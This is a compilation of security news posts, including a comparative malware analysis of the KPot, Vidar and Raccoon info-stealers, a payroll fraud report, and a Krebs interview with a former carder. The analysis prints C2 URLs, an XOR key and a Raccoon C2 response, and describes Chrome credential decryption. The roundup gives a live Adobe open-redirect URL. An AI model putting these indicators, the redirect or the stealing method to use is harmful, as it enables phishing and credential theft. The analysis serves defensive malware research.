The Good, the Bad and the Ugly in Cybersecurity – Week 39

Image of The Good, The Bad & The Ugly in CyberSecurity

The Good

There was good news this week for everyone concerned about the widening cybersecurity skills shortage. Thanks to an expansion in the US Department of Labor’s industry-recognized apprenticeship programs (IRAPs) and an extra $183.8 million in funding, 23 higher ed institutions and groups along with their private-sector partners will receive support to provide 85,000 apprenticeships across several fields, including information technology. On the back of that, Florida International University have announced Cyber-CAP, a program that will train 800 cybersecurity apprentices over a period of four years. 

image of florida International University

This week also saw release of a new public tool that should be of interest to threat researchers concerned with Russian APT groups. The sheer number and diversity of Russian-backed hacking groups with shared tooling has always presented an additional obstacle to attribution. Now, a new web-based interactive map can be used by anyone wishing to learn more about the connections between various groups, tools and campaigns. The map currently tracks 2000 malware samples and some 22000 connections between them. 

image of russian apt map

The Bad

A sophisticated and targeted campaign using one-click mobile exploits was revealed this week by researchers in collaboration with the Tibetan Computer Emergency Readiness Team (TibCERT). The campaign involved sending malicious WhatsApp messages to members of Tibetan groups using both Android and iOS devices. Although the exploits involved publicly-known vulnerabilities rather than exploiting any new zero days, the researchers were able to link the threat actor to an earlier campaign that targeted the Uyghur ethnic minority. That points the finger at a likely Chinese-backed APT group. Activists in Hong Kong take note.

malicious whats app messages

The Ugly

Phishing remains the number one vector of compromise, so it’s unfortunate to see yet more open redirects become available for attackers to exploit. In a thread entitled Here’s a phishing URL to give you nightmares…, Reddit user wanderingbilby explained how he stumbled over an adobe.com domain being used to redirect the unwary to a compromised WordPress site hosted on Microsoft’s windows.net. The trick is easy to pull off. Add whatever (legitimate!) domain you like in place of in this one and Adobe will kindly redirect it for you.

https://t-info.mail.adobe.com/r/?id=hc43f43t4a,afd67070,affc7349&p1=

It’s hardly a new vector: as other Reddit commentators were quick to point out, spammers have been seen exploiting open redirects via LinkedIn, Google and many other domains for some time. What it does highlight is that simply training your users to examine the primary domain in a link is neither a reliable nor sufficient method of protection.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google will soon open a cloud region in Poland

Google today announced its plans to open a new cloud region in Warsaw, Poland to better serve its customers in Central and Eastern Europe.

This move is part of Google’s overall investment in expanding the physical footprint of its data centers. Only a few days ago, after all, the company announced that, in the next two years, it would spend $3.3 billion on its data center presence in Europe alone.

Google Cloud currently operates 20 different regions with 61 availability zones. Warsaw, like most of Google’s regions, will feature three availability zones and launch with all the standard core Google Cloud services, including Compute Engine, App Engine, Google Kubernetes Engine, Cloud Bigtable, Cloud Spanner and BigQuery.

To launch the new region in Poland, Google is partnering with Domestic Cloud Provider (a.k.a. Chmury Krajowej, which itself is a joint venture of the Polish Development Fund and PKO Bank Polski). Domestic Cloud Provider (DCP) will become a Google Cloud reseller in the country and build managed services on top of Google’s infrastructure.

“Poland is in a period of rapid growth, is accelerating its digital transformation, and has become an international software engineering hub,” writes Google Cloud CEO Thomas Kurian. “The strategic partnership with DCP and the new Google Cloud region in Warsaw align with our commitment to boost Poland’s digital economy and will make it easier for Polish companies to build highly available, meaningful applications for their customers.”

MyPayrollHR CEO Arrested, Admits to $70M Fraud

Earlier this month, employees at more than 1,000 companies saw one or two paycheck’s worth of funds deducted from their bank accounts after the CEO of their cloud payroll provider absconded with $35 million in payroll and tax deposits from customers. On Monday, the CEO was arrested and allegedly confessed that the diversion was the last desperate gasp of a financial shell game that earned him $70 million over several years.

Michael T. Mann, the 49-year-old CEO of Clifton Park, NY-based MyPayrollHR, was arrested this week and charged with bank fraud. In court filings, FBI investigators said Mann admitted under questioning that in early September — on the eve of a big payroll day — he diverted to his own bank account some $35 million in funds sent by his clients to cover their employee payroll deposits and tax withholdings.

After that stunt, two different banks that work with Mann’s various companies froze those corporate accounts to keep the funds from being moved or withdrawn. That action set off a chain of events that led another financial institution that helps MyPayrollHR process payments to briefly pull almost $26 million out of checking accounts belonging to employees at more than 1,000 companies that use MyPayrollHR.

At the same time, MyPayrollHR sent a message (see screenshot above) to clients saying it was shutting down and that customers should find alternative methods for paying employees and for processing payroll going forward.

In the criminal complaint against Mann (PDF), a New York FBI agent said the CEO admitted that starting in 2010 or 2011 he began borrowing large sums of money from banks and financing companies under false pretenses.

“While stating that MyPayroll was legitimate, he admitted to creating other companies that had no purpose other than to be used in the fraud; fraudulently representing to banks and financing companies that his fake businesses had certain receivables that they did not have; and obtaining loans and lines of credit by borrowing against these non-existent receivables.”

“Mann estimated that he fraudulently obtained about $70 million that he has not paid back. He claimed that he committed the fraud in response to business and financial pressures, and that he used almost all of the fraudulently obtained funds to sustain certain businesses, and purchase and start new ones. He also admitted to kiting checks between Bank of America and Pioneer [Savings Bank], as part of the fraudulent scheme.”

Check-kiting is the illegal act of writing a check from a bank account without sufficient funds and depositing it into another bank account, explains MagnifyMoney.com. “Then, you withdraw the money from that second account before the original check has been cleared.”

Kiting also is known as taking advantage of the “float,” which is the amount of time between when an individual submits a check as payment and when the individual’s bank is instructed to move the funds from the account.

Magnify Money explains more:

“Say, for example, that you write yourself a check for $500 from checking account A, and deposit that check into checking account B — but the balance in checking account A is only $75. Then, you promptly withdraw the $500 from checking account B. This is check-kiting, a form of check fraud that uses non-existent funds in a checking account or other type of bank account. Some check-kiting schemes use multiple accounts at a single bank, and more complicated schemes involve multiple financial institutions.”

“In a more complex scenario, a person could open checking accounts at bank A and bank B, at first depositing $500 into bank A and nothing in bank B. Then, they could write a check for $10,000 with account A and deposit it into account B. Bank B immediately credits the account, and in the time it might take for bank B to clear the check (generally about three business days), the scammer writes a $10,000 check with bank B, which gets deposited into bank A to cover the first check. This could keep going, with someone writing checks between banks where there’s no actual funds, yet the bank believes the money is real and continues to credit the accounts.”

The government alleges Mann was kiting millions of dollars in checks between his accounts at Bank of American and Pioneer from Aug. 1, 2019 to Aug. 30, 2019.

For more than a decade, MyPayrollHR worked with California-based Cachet Financial Services to process payroll deposits for MyPayrollHR client employees. Every other week, MyPayrollHR’s customers would deposit their payroll funds into a holding account run by Cachet, which would then disburse the payments into MyPayrollHR client employee bank accounts.

But when Mann diverted $26 million in client payroll deposits from Cachet to his account at Pioneer Bank, Cachet’s emptied holding account was debited for the payroll payments. Cachet quickly reversed those deposits, causing one or two pay periods worth of salary to be deducted from bank accounts for employees of companies that used MyPayrollHR.

That action caused so much uproar from affected companies and their employees that Cachet ultimately decided to cancel all of those reversals and absorb that $26 million hit, which it is now trying to recover through the courts.

According to prosecutors in New York, Pioneer was Mann’s largest creditor.

“Mann stated that the payroll issue was precipitated by his decision to route MyPayroll’s clients’ payroll payments to an account at Pioneer instead of directly to Cachet,” wrote FBI Special Agent Matthew J. Wabby. “He did this in order to temporarily reduce the amount of money he owed to Pioneer. When Pioneer froze Mann’s accounts, it’s also (inadvertently) stopped movement of MyPayroll’s clients’ payroll payments to Cachet.”

Approximately $9 million of the $35 million diverted by Mann was supposed to go to accounts at the National Payment Corporation (NatPay) — the Florida-based firm which handles tax withholdings for MyPayrollHR clients. NatPay said its insurance should help cover the losses it incurred when MyPayrollHR’s banks froze the company’s accounts.

Court records indicate Mann hasn’t yet entered a plea, but that he was ordered to be released today under a $200,000 bond secured by a family home and two vehicles. His passport also was seized.

Info Stealers | How Malware Hacks Private User Data

The Zero2Hero malware course continues with Daniel Bunce exploring information stealers that target users’ browser data, passwords and other sensitive credentials.

feature image info stealers with text

One of the most common types of malware found nowadays are known as Info-Stealers. As the name suggests, the sole purpose of Info-Stealers is to steal as much personal information as possible, from basic system information up to locally stored usernames and passwords. They are typically not very sophisticated and are usually sold on hacking-related sites such as HackForums from as little as $10 to over a couple of hundred dollars. Most info-stealers out there follow a very similar methodology when stealing user information, with only a few major differences such as encryption algorithms and the networking side of things. In this post, we will be taking a look at three different popular info-stealers: KPot, Vidar, and Raccoon Stealer, and find the commonalities between the three in the amount of data each attempts to steal.

KPot Info-Stealer

According to the NJCCIC, KPot Stealer is a stealer

“that focuses on exfiltrating account information and other data from web browsers, instant messengers, email, VPN, RDP, FTP, cryptocurrency, and gaming software.”

This was later altered to also target users of the Jaxx cryptocurrency wallet.

Upon startup, KPot will begin to load required API calls using API hashing; however, rather than using a common hashing algorithm such as CRC-32, it utilizes an algorithm known as MurmurHash for hashing and importing.

image of kpot 1

KPot also contains many encrypted strings, which are stored in the sample in arrays. One function is used for decryption, where the first argument depicts which string should be decrypted. The algorithm used to decrypt these strings is a simple XOR loop, using a key stored in the mentioned array. These arrays contain the XOR key, size of the string, and a pointer to the encrypted string.

image of kpot info stealer 2

image of kpot info stealer 3

Another interesting feature of KPot is the checking of the default user language ID. The value of this is compared to languages from countries that are part of the Commonwealth of Independent States (CIS), and if a match is discovered, the process will exit. This is quite common in a lot of samples, as threat actors who are based there can avoid legal issues as long as they don’t infect anyone in those countries.

image of kpot info stealer 4

Looking at the communications side of things, KPot communicates over HTTP to a hardcoded C2 panel. In this sample, the C2 server is:

http[:]//bendes[.]co[.]uk/lmpUNlwDfoybeulu/gate[.]php

Upon first contact, the sample simply tries to perform a GET request on the C2 server until it gets a response. The response is Base64 Encoded and XOR’d with a key that is stored in the binary in one of the encrypted arrays. In this sample, the key is:

4p81GSwBwRrAhCYK

image of kpot info stealer 5

Once the data has been decrypted, KPot parses the data to find the commands it has been given, such as files to steal, passwords to retrieve, and system information. The system information is collected, comprising of system GUIDs, RAM information, Screen Size, CPU, plus the data exfiltrated based on the commands. As this is not meant to be a full analysis of KPot, I will skip the majority of the communications phase; however, I highly suggest taking a look at it if you are interested in learning malware analysis but don’t want anything highly complicated.

As with the password stealing, it is almost identical to that of Vidar and Raccoon, and as at the time of writing the C2 server for this sample had gone down, it was very unlikely (without C2 replication) that the sample could get past the initial connection stage. Therefore, the main comparisons of the password stealing capabilities will be done between Vidar and Raccoon.

Vidar Stealer

The Vidar Stealer is another popular stealer that was utilized by the threat actors behind GandCrab to steal user information, profile a system, and finally drop and execute the GandCrab ransomware, increasing profitability with each infection. This stealer is actually a fork of the Arkei stealer, and according to another security researcher, Fumik0, there are very little differences in the operations of the two. Interestingly out of the three samples discussed here, only Vidar was packed using a simple self-injection packer.

As soon as we open up Vidar in IDA, we can already see the checks for the Locale – in this sample there are a lot less checks, potentially narrowing down the locations where the threat actors are based; however, this could just be a false positive.

image of vidar info stealer 1

As we saw in the previous info-stealer, Vidar also utilizes encrypted strings, although in this case they are easier to locate based on the sheer size of the function. The encrypted strings contain the file paths and names of each browser, wallet, and piece of software that Vidar can steal information from. This ranges from the basic browsers such as Opera, Chrome, and Firefox all the way up to TOR browser and a large number of uncommon browsers – there is a very high chance that for any browser you can think of, Vidar steals some form of information from it, whether it is cookies, usernames and passwords, or card details.

image of Vidar info stealer img2

image of Vidar info stealer img3

image of Vidar info stealer img4

image of Vidar info stealer 5

It also targets software such as Telegram and plenty of Cryptowallets, making it no surprise it was the tool of choice for those behind the infamous Gandcrab. This is probably one of the major differences between info-stealers: the amount of information that each is capable of stealing. Vidar covers all bases, whereas smaller tools such as Raccoon Stealer focus on the more popular software like Chrome and Opera.

image of Vidar info stealer 6

Not only does Vidar steal a vast quantity of data from software, it also gathers as much system information as possible, and stores this in the file information.txt inside a created directory in ProgramData. The data it attempts to gather consists of data such as running processes and system hardware, but it also attempts to gather information such as the IP address, country, city, geo-coordinates and ISP of the victim. Vidar then steals as much information as possible including Telegram passwords and browser information, storing the data in files called outlook.txt and passwords.txt. This is then zipped, and sent to the C2 server.

image of Vidar info stealer 7

image of Vidar info Stealer 8

Rather than cover password extraction of every single browser, I will cover how passwords and usernames are extracted from one of the most popular browsers: Chrome.

When Chrome (and most other browsers) ask if you want to save the login information for later use, what happens is that information is encrypted and stored in an SQL Database file on the machine. When you revisit that site and try to log in again, Chrome will open up the SQL DB, decrypt it, and locate the correct login. The issue with this is that any malware running on the system is able to do the same. In order to encrypt and decrypt the data, Chrome utilizes 2 Windows API calls: CryptProtectData and CryptUnprotectData. All the malware has to do is utilize the CryptUnprotectData API call to decrypt the saved logins and extract them, either by dropping an SQLITE3 DLL to the system or by using one already present.

image of Vidar info stealer 9

Python Example of Chrome Password Stealer (here)

Some browsers attempt to prevent malware from performing this extraction by using their own encryption algorithms, such as in the case of Firefox, where in order to decrypt the data, two Firefox DLLs need to be loaded and used; however, this only slows down the threat actors briefly, as they then simply dynamically import these libraries at runtime and decrypt the passwords – or download the required libraries in the case of the next stealer, Raccoon Stealer.

Raccoon Stealer

Raccoon Stealer is the newest stealer to be released out of the three. According to Malpedia, it collects 

“passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies”. 

As you can probably imagine, it is very similar to the previous two info-stealers we covered, so let’s take a quick peek into the internals.

What sets Raccoon Stealer apart from the previous two stealers is the fact it downloads a ZIP file and a DLL from the C2 server to perform its stealing routines. As mentioned before, in order to extract login info from Chrome and multiple other browsers, SQLITE3.DLL is required. Rather than bundling this inside the file, Raccoon Stealer simply downloads it from the C2 server. The next file downloaded (the ZIP) contains 50+ libraries required for login/user data extraction from different browsers and software.

image of Racoon info stealer 1

The communications protocol is also fairly simple, and only utilizes Base64 for encoding sent data. Examining one of the files tagged Raccoon Stealer on AnyRun, we can see that the first contact with the C2 simply passes a base64 encoded string. We can see the decoded version of this below.

bot_id=90059C37-1320-41A4-B58D-2B75A9850D2F_admin&config_id=270ed6774bfe19220ed8e893bc7a752ef50727e6&data=null

The response from the C2 is in JSON format and cleartext, and can be seen below:

{
    "url": "http://34.90.238.61/file_handler/file.php?hash=1f0af54680ea00537f3377b60eb459472d62373b&js=8b72c2da30a231cbd0744352e39e6d3a2c9d9cf9&callback=http://34.90.238.61/gate",
    "attachment_url": "http://34.90.238.61/gate/sqlite3.dll",
    "libraries": "http://34.90.238.61/gate/libs.zip",
    "ip": "185.192.69.140",
    "config": {
        "masks": null,
        "loader_urls": null
    },
    "is_screen_enabled": 0,
    "is_history_enabled": 0
}

Here we can see clearly that Raccoon Stealer gets the URLs of the SQLITE3.DLL and the required libraries ZIP file, as well as the configuration, through the response from the C2, increasing the chance that it will get detected by Anti-Virus due to how “noisy” it is on an infected system. Looking at the strings of the Raccoon Stealer payload is enough to determine it’s capabilities as a password stealer.

image of Racoon info stealer 2

Wrapping Up

So, while there are some similarities in how each of the samples perform their user-data stealing tasks, there is definitely a differing level of sophistication between them. While Raccoon Stealer and KPot attempt to steal credentials from the most common software in use, Vidar attempts to steal as much data as possible, including location data. This explains why the threat actors behind GandCrab thought it was the best tool for the job: it allowed them to profit off of stolen credentials as well as profile the system before deploying GandCrab to suitable systems. In contrast, KPot has a modular interface, allowing the threat actors to choose what they want to steal, which is fairly strange considering there is no reason not to steal certain credentials on the machine. Finally, Raccoon Stealer is the least sophisticated of the three, seemingly just a basic information stealer with limited functionality; however, it still gets the job done. 

The one main commonality between all three, however, is the strings, and this shared trait is the best way to identify an information stealer: if you can see references to browsers, API calls such as CryptUnprotectData, and libraries such as SQLITE3 in the strings, then there is a very high chance you are analyzing an info-stealer.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

India’s Darwinbox raises $15M to bring its HR tech platform to more Asian markets

An Indian SaaS startup, which is increasingly courting clients from outside the country, just raised a significant amount of capital to expand its business.

Hyderabad-based Darwinbox, which operates a cloud-based human resource management platform, said on Thursday it has raised $15 million in a new financing round. The Series B round — which moves the firm’s total raise to $19.7 million — was led by Sequoia India and saw participation from existing investors Lightspeed India Partners, Endiya Partners and 3one4 Capital.

More than 200 firms — including giants such as adtech firm InMobi, fintech startup Paytm, drink conglomerate Bisleri, automobile maker Mahindra, Kotak group and delivery firms Swiggy and Milkbasket — use Darwinbox’s HR platform to serve half a million of their employees in 50 nations, Rohit Chennamaneni, co-founder of Darwinbox, told TechCrunch in an interview.

The startup, which competes with giants such as SAP and Oracle, said its platform enables a high level of configurability and ease of use, and understands the needs of modern employees. “The employees today who have grown accustomed to using consumer-focused services such as Uber and Amazon are left disappointed in their experience with their own firm’s HR offerings,” said Gowthami Kanumuru, VP Marketing at Darwinbox, in an interview.

Darwinbox’s HR platform offers a range of features, including the ability for firms to offer their employees insurance and early salary as loans. Its platform also features social networks for employees within a company to connect and talk, as well as an AI assistant that allows them to apply for a leave or set up meetings with quick voice commands from their phone.

“The AI system is not just looking for certain keywords. If an employee tells the system he or she is not feeling well today, it automatically applies a leave for them,” she said.

Darwinbox’s platform is built to handle onboarding new employees, keep a tab on their performance, monitor attrition rate and maintain an ongoing feedback loop. Or as Kanumuru puts it, the entire “hiring to retiring” cycle.

One of Darwinbox’s clients is L&T, which is tasked with setting up subways in many Indian cities. L&T is using Darwin’s geo-fencing feature to log the attendance of employees. “They are not using biometric punch machine that is typically used by other firms. Instead, they just require their 1,200 employees to check-in from the workplace using their phones,” said Kanumuru.

darwinbox event

Additionally, Darwinbox is largely focusing on serving companies based in Asia as it believes Western companies’ solutions are not a great fit for people here, said Kanumuru. The startup began courting clients in Southeast Asian markets last year.

“Our growth is a huge validation for our vision,” she said. “Within six months of operations, we had the delivery giant Delhivery with over 23,000 employees use our platform.”

In a statement to TechCrunch, Dev Khare, a partner at Lightspeed Venture, said, “there is a new trend of SaaS companies targeting the India/SE Asia markets. This trend is gathering steam and is disproving the conventional wisdom that Asia-focused SaaS companies cannot get to be big companies. We firmly believe that Asia-focused SaaS companies can get to large impact value and become large and profitable. Darwinbox is one of these companies.”

Darwinbox’s Chennamaneni said the startup will use the fresh capital to expand its footprints in Indonesia, Malaysia, Thailand and other Southeast Asian markets. Darwinbox also will expand its product offerings to address more of employees’ needs. The startup is also looking to make its platform enable tasks such as booking of flights and hotels.

Chennamaneni, an alum of Google and McKinsey, said Darwinbox aims to double the number of clients it has in the next six to nine months.

Battlefield vets StrongSalt (formerly OverNest) announces $3M seed round

StrongSalt, then known as OverNest, appeared at the TechCrunch Disrupt NYC Battlefield in 2016, and announced a product for searching encrypted code, which remains unusual to this day. Today, the company announced a $3 million seed round led by Valley Capital Partners.

StrongSalt founder and CEO Ed Yu says encryption remains a difficult proposition, and that when you look at the majority of breaches, encryption wasn’t used. He said that his company wants to simplify adding encryption to applications, and came up with a new service to let developers add encryption in the form of an API. “We decided to come up with what we call an API platform. It’s like infrastructure that allows you to integrate our solution into any existing or any new applications,” he said.

The company’s original idea was to create a product to search encrypted code, but Yu says the tech has much more utility as an API that’s applicable across applications, and that’s why they decided to package it as a service. It’s not unlike Twilio for communications or Stripe for payments, except in this case you can build in searchable encryption.

The searchable part is actually a pretty big deal because, as Yu points out, when you encrypt data it is no longer searchable. “If you encrypt all your data, you cannot search within it, and if you cannot search within it, you cannot find the data you’re looking for, and obviously you can’t really use the data. So we actually solved that problem,” he said.

Developers can add searchable encryption as part of their applications. For customers already using a commercial product, the company’s API actually integrates with popular services, enabling customers to encrypt the data stored there, while keeping it searchable.

“We will offer a storage API on top of Box, AWS S3, Google Cloud, Azure — depending on what the customer has or wants. If the customer already has AWS S3 storage, for example, then when they use our API, and after encrypting the data, it will be stored in their AWS repository,” Yu explained.

For those companies that don’t have a storage service, the company is offering one. What’s more, they are using the blockchain to provide a mechanism for sharing, auditing and managing encrypted data. “We also use the blockchain for sharing data by recording the authorization by the sender, so the receiver can retrieve the information needed to reconstruct the keys in order to retrieve the data. This simplifies key management in the case of sharing and ensures auditability and revocability of the sharing by the sender,” Yu said.

If you’re wondering how the company has been surviving since 2016, while only getting its seed round today, it had a couple of small seed rounds prior to this, and a contract with the U.S. Department of Defense, which replaced the need for substantial earlier funding.

“The DOD was looking for a solution to have secure communication between computers, and they needed to have a way to securely store data, and so we were providing a solution for them,” he said. In fact, this work was what led them to build the commercial API platform they are offering today.

The company, which was founded in 2015, currently has 12 employees spread across the globe.

MediaRadar’s new product helps event organizers maximize sales

MediaRadar CEO Todd Krizelman describes his company as having “a very specific objective, which is to help media salespeople sell more advertising” by providing them with crucial data. And with today’s launch of MediaRadar Events, Krizelman hopes to do something similar for event organizers.

These customer groups might actually be one and the same, as plenty of companies (including TechCrunch) see both advertising and events as part of their business. In fact, Krizelman said customer demand “basically pushed us into this business.

He also suggested that after years of seeing traditional ad dollars shifting into digital, “the money is now moving out of digital into events.”

If you’re organizing a trade show, you can use MediaRadar Events to learn about the overall size of the market, and then see who’s been purchasing sponsorships and exhibitor booths at similar events.

The product doesn’t just tell you who to reach out to, but how much these companies have paid for booths and sponsorships in the past, whether there are seasonal patterns in their conference spending and how that spending fits into their overall marketing budget — after all, Krizelman said, “In 2019, very few companies are siloed by media format as a buyer or a seller. Anyone doing that is putting their business at risk.”

He also described collecting the data needed to power MediaRadar Events as “much more complicated than we expected,” which is why it took the team two years to build the product. He said that data comes from three sources — some of it is posted publicly by event organizers, some is shared directly by the event organizers with MediaRadar and, in some cases, members of the MediaRadar team will attend the events themselves.

MediaRadar Events support a wide range of events, although Krizelman acknowledged that it doesn’t have data for every industry. For example, he suggested that a convention for coin-operated laundromat owners might be “too niche” (though he hastened to add that he meant no offense to the laundromat business).

In a statement, James Ogle — chief financial officer at Access Intelligence (which owns the LeadsCon conference and publications like AdExchanger) — said:

Hosting events and the resulting revenue that comes from them is a big part of our business. However, the event space is getting more and more crowded and also more niche. Relevancy equals value, so we want to make sure our attendees are within the right target market for our exhibitors. MediaRadar provides critical transparency into the marketplace.

Interview With the Guy Who Tried to Frame Me for Heroin Possession

In April 2013, I received via U.S. mail more than a gram of pure heroin as part of a scheme to get me arrested for drug possession. But the plan failed and the Ukrainian mastermind behind it soon after was imprisoned for unrelated cybercrime offenses. That individual recently gave his first interview since finishing his jail time here in the states, and he’s shared some select (if often abrasive and coarse) details on how he got into cybercrime and why. Below are a few translated excerpts.

When I first encountered now-31-year-old Sergei “Fly,” “Flycracker,” “MUXACC” Vovnenko in 2013, he was the administrator of the fraud forum “thecc[dot]bz,” an exclusive and closely guarded Russian language board dedicated to financial fraud and identity theft.

Many of the heavy-hitters from other fraud forums had a presence on Fly’s forum, and collectively the group financed and ran a soup-to-nuts network for turning hacked credit card data into mounds of cash.

Vovnenko first came onto my radar after his alter ego Fly published a blog entry that led with an image of my bloodied, severed head and included my credit report, copies of identification documents, pictures of our front door, information about family members, and so on. Fly had invited all of his cybercriminal friends to ruin my financial identity and that of my family.

Somewhat curious about what might have precipitated this outburst, I was secretly given access to Fly’s cybercrime forum and learned he’d freshly hatched a plot to have heroin sent to my home. The plan was to have one of his forum lackeys spoof a call from one of my neighbors to the police when the drugs arrived, complaining that drugs were being delivered to our house and being sold out of our home by Yours Truly.

Thankfully, someone on Fly’s forum also posted a link to the tracking number for the drug shipment. Before the smack arrived, I had a police officer come out and take a report. After the heroin showed up, I gave the drugs to the local police and wrote about the experience in Mail From the Velvet Cybercrime Underground.

Angry that I’d foiled the plan to have me arrested for being a smack dealer, Fly or someone on his forum had a local florist send a gaudy floral arrangement in the shape of a giant cross to my home, complete with a menacing message that addressed my wife and was signed, “Velvet Crabs.”

The floral arrangement that Fly or one of his forum lackeys had delivered to my home in Virginia.

Vovnenko was arrested in Italy in the summer of 2014 on identity theft and botnet charges, and spent some 15 months in arguably Italy’s worst prison contesting his extradition to the United States. Those efforts failed, and he soon pleaded guilty to aggravated identity theft and wire fraud, and spent several years bouncing around America’s prison system.

Although Vovnenko sent me a total of three letters from prison in Naples (a hand-written apology letter and two friendly postcards), he never responded to my requests to meet him following his trial and conviction on cybercrime charges in the United States. I suppose that is fair: To my everlasting dismay, I never responded to his Italian dispatches (the first I asked to be professionally analyzed and translated before I would touch it).

Seasons greetings from my pen pal, Flycracker.

After serving his 41 month sentence in the U.S., Vovnenko was deported, although it’s unclear where he currently resides (the interview excerpted here suggests he’s back in Italy, but Fly doesn’t exactly confirm that). 

In an interview published on the Russian-language security blog Krober[.]biz, Vovnenko said he began stealing early in life, and by 13 was already getting picked up for petty robberies and thefts.

A translated English version of the interview was produced and shared with KrebsOnSecurity by analysts at New York City-based cyber intelligence firm Flashpoint.

Sometime in the mid-aughts, Vovnenko settled with his mother in Naples, Italy, but he had trouble keeping a job for more than a few days. Until a chance encounter led to a front job at a den of thieves.

“When I came to my Mom in Naples, I could not find a permanent job. Having settled down somewhere at a new job, I would either get kicked out or leave in the first two days. I somehow didn’t succeed with employment until I was invited to work in a wine shop in the historical center of Naples, where I kinda had to wipe the dust from the bottles. But in fact, the wine shop turned out to be a real den and a sales outlet of hashish and crack. So my job was to be on the lookout and whenever the cops showed up, take a bag of goods and leave under the guise of a tourist.”

Cocaine and hash were plentiful at his employer’s place of work, and Vovnenko said he availed himself of both abundantly. After he’d saved enough to buy a computer, Fly started teaching himself how to write programs and hack stuff. He quickly became enthralled with the romanticized side of cybercrime — the allure of instant cash — and decided this was his true vocation.

“After watching movies and reading books about hackers, I really wanted to become a sort of virtual bandit who robs banks without leaving home,” Vovnenko recalled. “Once, out of curiosity, I wrote an SMS bomber that used a registration form on a dating site, bypassing the captcha through some kind of rookie mistake in the shitty code. The bomber would launch from the terminal and was written in Perl, and upon completion of its work, it gave out my phone number and email. I shared the bomber somewhere on one of my many awkward sites.”

“And a couple of weeks later they called me. Nah, not the cops, but some guy who comes from Sri Lanka who called himself Enrico. He told me that he used my program and earned a lot of money, and now he wants to share some of it with me and hire me. By a happy coincidence, the guy also lived in Naples.”

“When we met in person, he told me that he used my bomber to fuck with a telephone company called Wind. This telephone company had such a bonus service: for each incoming SMS you received two cents on the balance. Well, of course, this guy bought a bunch of SIM cards and began to bomb them, getting credits and loading them into his paid lines, similar to how phone sex works.”

But his job soon interfered with his drug habit, and he was let go.

“At the meeting, Enrico gave me 2K euros, and this was the first money I’ve earned, as it is fashionable to say these days, on ‘cybercrime’. I left my previous job and began to work closely with Enrico. But always stoned out of my mind, I didn’t do a good job and struggled with drug addiction at that time. I was addicted to cocaine, as a result, I was pulling a lot more money out of Enrico than my work brought him. And he kicked me out.”

After striking out on his own, Vovnenko says he began getting into carding big time, and was introduced to several other big players on the scene. One of those was a cigarette smuggler who used the nickname Ponchik (“Doughnut”).

I wonder if this is the same Ponchik who was arrested in 2013 as being the mastermind behind the Blackhole exploit kit, a crimeware package that fueled an overnight explosion in malware attacks via Web browser vulnerabilities.

In any case, Vovnenko had settled on some schemes that were generating reliably large amounts of cash.

“I’ve never stood still and was not focusing on carding only, with the money I earned, I started buying dumps and testing them at friends’ stores,” Vovnenko said. “Mules, to whom I signed the hotlines, were also signed up for cashing out the loads, giving them a mere 10 percent for their work. Things seemed to be going well.”

FAN MAIL

There is a large chronological gap in Vovnenko’s account of his cybercrime life story from that point on until the time he and his forum friends started sending heroin, large bags of feces and other nasty stuff to our Northern Virginia home in 2013.

Vovnenko claims he never sent anything and that it was all done by members of his forum.

-Tell me about the packages to Krebs.
“That ain’t me. Suitcase filled with sketchy money, dildoes, and a bouquet of coffin wildflowers. They sent all sorts of crazy shit. Forty or so guys would send. When I was already doing time, one of the dudes sent it. By the way, Krebs wanted to see me. But the lawyer suggested this was a bad idea. Maybe he wanted to look into my eyes.”

In one part of the interview, Fly is asked about but only briefly touches on how he was caught. I wanted to add some context here because this part of the story is richly ironic, and perhaps a tad cathartic.

Around the same time Fly was taking bitcoin donations for a fund to purchase heroin on my behalf, he was also engaged to be married to a nice young woman. But Fly apparently did not fully trust his bride-to-be, so he had malware installed on her system that forwarded him copies of all email that she sent and received.

Fly,/Flycracker discussing the purchase of a gram of heroin from Silk Road seller “10toes.”

But Fly would make at least two big operational security mistakes in this spying effort: First, he had his fiancée’s messages forwarded to an email account he’d used for plenty of cybercriminal stuff related to his various “Fly” identities.

Mistake number two was the password for his email account was the same as one of his cybercrime forum admin accounts. And unbeknownst to him at the time, that forum was hacked, with all email addresses and hashed passwords exposed.

Soon enough, investigators were reading Fly’s email, including the messages forwarded from his wife’s account that had details about their upcoming nuptials, such as shipping addresses for their wedding-related items and the full name of Fly’s fiancée. It didn’t take long to zero in on Fly’s location in Naples.

While it may sound unlikely that a guy so immeshed in the cybercrime space could make such rookie security mistakes, I have found that a great many cybercriminals actually have worse operational security than the average Internet user.

I suspect this may be because the nature of their activities requires them to create vast numbers of single- or brief-use accounts, and in general they tend to re-use credentials across multiple sites, or else pick very poor passwords — even for critical resources.

In addition to elaborating on his hacking career, Fly talks a great deal about his time in various prisons (including their culinary habits), and an apparent longing or at least lingering fondness for the whole carding scene in general.

Towards the end, Fly says he’s considering going back to school, and that he may even take up information security as a study. I wish him luck in that whatever that endeavor is as long as he can also avoid stealing from people.

I don’t know what I would have written many years ago to Fly had I not been already so traumatized by receiving postal mail from him. Perhaps it would go something like this:

“Dear Fly: Thank you for your letters. I am very sorry to hear about the delays in your travel plans. I wish you luck in all your endeavors — and I sincerely wish the next hopeful opportunity you alight upon does not turn out to be a pile of shit.”

The entire translated interview is here (PDF). Fair warning: Many readers may find some of the language and topics discussed in the interview disturbing or offensive.

Detecting macOS.GMERA Malware Through Behavioral Inspection

Last week, researchers at Trend Micro spotted a new piece of in-the-wild macOS malware that spoofs a genuine stock market trading app to open a backdoor and run malicious code. In this post, we first give an overview of how the malware works, and then use this as an example to discuss different detection and response strategies, with a particular emphasis on explaining the principles and advantages of using behavioral detection on macOS.

feature image with text

An Overview of GMERA Malware

Let’s begin by taking a look at the technical details of this new piece of macOS malware. 

Two variants were initially discovered by researchers who identified them as GMERA.A and GMERA.B. In this post, we will focus on the interesting points in a particular sample of GMERA.B that pertain to detection and response. 

Our sample, which was not analayzed in the previous research, is:

d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Despite having been on VirusTotal for 9 days already, and that the initial Trend Micro research hit the news 5 days ago, this particular sample remains undetected by reputation engines on the VT site as of today.

image of undetected virus total

